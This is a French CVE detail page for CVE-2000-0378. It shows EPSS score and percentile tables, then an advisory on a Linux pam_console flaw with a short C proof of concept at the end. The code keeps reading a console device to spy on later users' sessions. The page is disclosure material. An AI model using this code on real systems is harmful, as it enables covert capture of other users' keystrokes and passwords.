CVE-2000-0378 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.96%	–	–
2022-03-13	–	–	1.96%	–	–
2022-04-03	–	–	1.96%	–	–
2022-07-31	–	–	1.96%	–	–
2023-02-26	–	–	1.96%	–	–
2023-03-12	–	–	–	0.05%	–
2024-02-11	–	–	–	0.05%	–
2024-03-31	–	–	–	0.05%	–
2024-06-02	–	–	–	0.05%	–
2024-06-30	–	–	–	0.05%	–
2024-08-04	–	–	–	0.05%	–
2024-08-11	–	–	–	0.05%	–
2024-11-10	–	–	–	0.05%	–
2025-01-19	–	–	–	0.05%	–
2025-01-19	–	–	–	0.05%	–
2025-03-18	–	–	–	–	0.42%
2025-03-30	–	–	–	–	0.42%
2025-03-30	–	–	–	–	0.42,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	56%
2022-03-13	57%
2022-04-03	77%
2022-07-31	78%
2023-02-26	79%
2023-03-12	19%
2024-02-11	11%
2024-03-31	12%
2024-06-02	13%
2024-06-30	14%
2024-08-04	13%
2024-08-11	14%
2024-11-10	15%
2025-01-19	16%
2025-01-19	16%
2025-03-18	6%
2025-03-30	59%
2025-03-30	59%

/* source: https://www.securityfocus.com/bid/1176/info A vulnerability exists in the pam_console PAM module, included as part of any Linux system running PAM. pam_console exists to own certain devices to users logging in to the console of a Linux machine. It is designed to allow only console users to utilize things such as sound devices. It will chown devices to users upon logging in, and chown them back to being owned by root upon logout. However, as certain devices do not have a 'hangup' mechanism, like a tty device, it is possible for a local user to continue to monitor activity on certain devices after logging out. This could allow an malicious user to sniff other users console sessions, and potentially obtain the root password if the root user logs in, or a user su's to root. They could also surreptitiously execute commands as the user on the console. */ #include <sys/fcntl.h> main(int argc,char*argv[]) { char buf[80*24]; int f=open(argv[1],O_RDWR); while (1) { lseek(f,0,0); read(f,buf,sizeof(buf)); write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi write(1,buf,sizeof(buf)); usleep(10000); } }